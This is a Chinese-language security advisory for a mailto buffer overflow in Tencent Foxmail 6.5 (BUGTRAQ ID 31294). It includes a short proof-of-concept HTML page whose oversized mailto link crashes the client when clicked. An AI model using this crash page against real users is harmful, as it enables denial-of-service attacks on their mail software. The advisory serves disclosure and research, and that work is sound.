Tencent Foxmail 6.5描述:
BUGTRAQ ID: 31294
Foxmail是在中国非常广泛使用的邮件客户端。
Foxmail客户端在处理href标签中的mailto字段时存在缓冲区溢出漏洞。如果用户将Foxmail设置为默认的邮件客户端的话,则受骗点击了网页中的发送邮件链接的话就可能触发这个溢出,导致客户端崩溃。
<*来源:Friddy
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<body>
<P>Author:friddy QQ:568623
<P>Result:Program Crash
<BR>
<A href="mailto:A%...............................................................................................................AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.com">
ClickME</a>
>Clickme</A>
</body>
</html>
建议:
厂商补丁:
Tencent
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://fox.foxmail.com.cn/